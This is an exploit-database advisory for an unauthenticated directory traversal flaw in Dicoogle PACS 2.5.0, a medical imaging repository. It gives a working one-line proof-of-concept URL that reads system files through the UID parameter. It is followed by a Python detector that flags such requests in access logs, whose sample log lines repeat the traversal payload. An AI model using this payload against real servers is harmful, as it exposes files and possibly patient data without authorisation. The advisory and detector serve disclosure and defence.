- 18 Dec 2022
- EDB-ID: 45007
- EDB verified: Passed
- Author: CARLOS AVILA
- Vulnerability type: WEBAPPS
- Platform: MULTIPLE
- CVE: N/A
- Date published: 2018-07-11
Dicoogle PACS 2.5.0 - Directory Traversal
Code:
# Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal
# Date: 2018-05-25
# Software Link: http://www.dicoogle.com/home
# Version: Dicoogle PACS 2.5.0-20171229_1522
# Category: webapps
# Tested on: Windows 2012 R2
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt
# 1. Description
# Dicoogle is an open source medical imaging repository with an extensible
# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable
# to local file inclusion. This allows an attacker to read arbitrary files that the
# web user has access to. Admin credentials aren't required. The ‘UID’ parameter
# via GET is vulnerable.
# 2. Proof of Concept
http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
- Source: www.exploit-db.com
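
A detection sketch for the request pattern shown in the proof of concept, added here as an example and not part of the original advisory or of Dicoogle's code: it scans access-log lines for `/exportFile` requests whose `UID` decodes to a path instead of an identifier, including double-encoded separators. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A ".." path segment delimited by either separator, checked after decoding.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')
# Absolute paths (drive letter or leading separator) are not valid UIDs either.
ABSOLUTE_RE = re.compile(r'^(?:[A-Za-z]:|[\\/])')

# Constructed sample lines (documentation IP range, made-up sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Jul/2018:10:02:11 +0000] "GET /exportFile?UID=1.2.840.113619.2.55.3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [11/Jul/2018:10:02:15 +0000] "GET /exportFile?UID=..%5c..%5cwindows%5cwin.ini HTTP/1.1" 200 92',
    '203.0.113.9 - - [11/Jul/2018:10:02:19 +0000] "GET /exportFile?UID=..%255c..%255cwindows%255cwin.ini HTTP/1.1" 404 0',
    '203.0.113.7 - - [11/Jul/2018:10:03:01 +0000] "GET /search?query=..%5c HTTP/1.1" 200 10',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%255c) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_uid(log_line):
    """Return the decoded UID if an /exportFile request carries a path, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if url.path.rstrip("/").lower() != "/exportfile":
        return None
    # parse_qs performs the first round of percent-decoding.
    for raw in parse_qs(url.query, keep_blank_values=True).get("UID", []):
        uid = fully_decode(raw)
        if TRAVERSAL_RE.search(uid) or ABSOLUTE_RE.match(uid):
            return uid
    return None


def flag_lines(lines):
    """Return (line_index, decoded_uid) for every suspicious request."""
    hits = ((i, suspicious_uid(line)) for i, line in enumerate(lines))
    return [(i, uid) for i, uid in hits if uid is not None]
```

A 200 response on a flagged line, as in the second sample, is the case to triage first, since it suggests the file was actually served.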